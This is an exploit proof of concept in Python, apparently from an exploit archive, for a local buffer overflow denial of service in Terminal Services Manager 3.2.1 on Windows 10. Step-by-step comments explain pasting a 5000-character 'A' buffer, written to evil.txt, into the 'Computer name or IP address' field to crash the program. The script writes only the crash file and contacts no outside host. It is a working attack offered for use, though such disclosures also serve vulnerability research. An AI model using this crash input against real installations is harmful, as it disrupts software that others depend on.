22 lines
No EOL
877 B
Python
Executable file
22 lines
No EOL
877 B
Python
Executable file
# -*- coding: utf-8 -*-
|
|
# Exploit Title: Terminal Services Manager 3.2.1 - Local Buffer Overflow Denial of Service
|
|
# Date: 22/05/2019
|
|
# Author: Alejandra Sánchez
|
|
# Vendor Homepage: https://lizardsystems.com
|
|
# Software: https://lizardsystems.com/files/releases/terminal-services-manager/tsmanager_setup_3.2.1.247.exe
|
|
# Version: 3.2.1 (Build 247)
|
|
# Tested on: Windows 10
|
|
|
|
# Steps to produce the crash:
|
|
# 1.- Run the python script 'tsmanager.py', it will create a new file 'evil.txt'
|
|
# 2.- Open Terminal Services Manager
|
|
# 3.- Click 'Add computer'
|
|
# 4.- Now paste the content of evil.txt into the field: 'Computer name or IP address' and click 'OK'
|
|
# 5.- In the 'List' tab select the computer created.
|
|
# 6.- Now in the 'Servers' tab double click on the created computer, wait and you will see a crash!
|
|
|
|
buffer = "\x41" * 5000
|
|
|
|
f = open ("evil.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |